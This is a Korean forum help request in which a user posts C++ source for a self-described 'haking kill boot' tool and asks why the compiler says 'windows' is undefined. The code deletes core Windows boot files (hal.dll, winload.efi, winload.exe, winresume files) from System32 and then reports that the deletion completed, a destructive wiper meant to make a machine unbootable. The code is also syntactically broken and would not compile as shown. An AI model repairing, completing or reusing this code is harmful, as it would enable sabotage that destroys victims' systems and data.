오류제발 알려주세요ㅠㅠ
소유
/* haking tool.cpp : 콘솔 응용 프로그램에 대한 진입점을 정의합니다.
저작권자:개발자 및 donto 분해했을경우 민형사 처벌됩니다.
*/
#include stdlib.h
#include stdio.h
#include conio.h
#include windows.h
int main(void)
{
windows(cd..);
windows(cd..);
printf(\a \t \t \t haking kill boot \n \n \n);
printf(\a \t \t \t 저작권자:개발자 및 donto 분해하는경우 민형사 처벌됩니다 \n \n \n);
printf(만든이: donto (이툴로 인하여 일어나는 모든일에 대해 제작자는 책임이 없습니다)\n \n);
remove(hal.dll);
remove(c:\\Windows\\System32\\hal.dll);
remove(winload.efi);
remove(c:\\Windows\\System32\Boot\\winload.efi);
remove(winload.exe);
remove(c:\\Windows\\System32\Boot\\winload.exe);
remove(winresume.efi);
remove(c:\\Windows\\System32\\Boot\\winresume.efi);
remove(winresume.exe);
remove(c:\\Windows\\System32\\Boot\\winresume.exe);
remove(TMPA84E.tmp);
remove(C:\\Windows\\System32\\catroot\\TMPA84E.tmp);
printf(\t \t \t 삭제가 정상적으로 완료되었습니다.!! \n \n \n \n \n \n \n \n \n \n);
getch();
return 0;
}
여기에서 1 IntelliSense: 식별자 windows이(가) 정의되어 있지 않습니다. d:\visaui c\haking tool kill data\haking tool kill data\haking kill data.cpp 11 2 haking tool kill data
라고 버그가 뜹니다 위에 windows.h에서 정의 된거 아닌가요? 고수님들 알려주세요